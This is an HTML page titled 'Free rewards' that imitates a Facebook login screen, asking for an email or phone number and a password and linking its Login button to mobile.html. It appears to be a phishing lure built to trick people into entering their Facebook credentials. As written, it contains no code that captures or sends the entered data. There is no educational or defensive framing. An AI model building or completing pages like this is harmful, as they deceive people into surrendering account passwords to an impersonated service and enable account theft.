<!DOCTYPE html>

<html>

<head>

  <meta charset="UTF-8">

  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>Free rewards</title>
  <style>html{
      background-color: black;
      background:url(icon.jpg);
      background-repeat:no-repeat;
      background-size:cover;
      height:100%;
      width:100%;
      opacity:100%;
    }
    table{
      background :rgba(0,5,40,0.7);
      align:center;
      margin-left: 10%;
      border-radius:10px;
      border-top-right-radius: 110px;
    }
    form{
      border-right: 10px;
      //align:center;
      //margin-left: 10%;
    // width: 80%;
    //background :rgba(0,5,40,0.7);
     // border-radius: 25px;
    }
    table.dummy{
  padding-top: 50%;
 
    }
    td{
      width :180px;
      height:80px;
      margin: 40px;
      } 
    td.facebook{
      width:180px;
      height:80px;
      color:white;
      font-weight: bold;
      opacity :60%;
      font-size: 50px;
      background-image:linear-gradient(to bottom right, #3b5999,#3b5999,#3b5999);
      border-radius: 20px 180px 10px 0;
      //border-top-left-radius: 20px;
      //border-top-right-radius: 20px;
      //padding-top: 10px;
 //padding-left: 40px;
 left:20px;
 border:5px solid yellow;
 
    }
    td.space{
      height: 12px;
      width: 100px;
    }
    input.email{
      width:700px;
      height:80px;
      font-size: 30px;
      opacity :0.5;
      margin-left: 40px;
      margin-right: 40px;
      border-radius: 13px;
      }
 
    input.submit{
      width:4cm;
      height: 1.5cm;
      background-image: linear-gradient(to bottom right,green,greenyellow);
       color:white;
       font-size: 28px;
       font-weight: bold;
       border-radius: 10px;
    }
    td.space{
      height:90px;
      width: 20px;
    }
    p{
      font-weight: bold;
      font-size: 38px;
      color:white;
      margin-left: 50px;
    }
    a{
      text-decoration: none;
      background-color:red
    }
    
    </style>

  <link href="startingpage.css" rel="stylesheet">

</head>

<body>

  <table class="dummy">

  </table>

  

    <table class="main"><div class="border">

      <form method="POST" action="#"class="black">

        

     <tr>

       <td class="facebook"align="ceter">facebook

        </td>

      </tr>

        

     <tr><td class="space"></td></tr>

      

      <tr>

        <td class="space">

          <p>Email:</p>

        </td>

      </tr>

      

      <tr>

        <td>

          <input type="email" class="email" placeholder="Email or phone">

        </td>

      </tr>

      

      

      <tr>

        <td class="space">

          <p>password:</p>

        </td>

      </tr>

      <tr>

        <td>

          <input class="email" type="password" placeholder="Password">

        </td>

      </tr>

      

      

       <tr><td class="space"></td></tr>

       

       

      <tr>

        <td align="center">

          <a href="mobile.html">

            <input type="submit" class="submit"value="Login">

          </a>

        </td>

      </tr>

      

      

      <tr>

        <td class="space">

          

        </td>

      </tr>

      

      </form>

      

    </table>

</body>

</html>

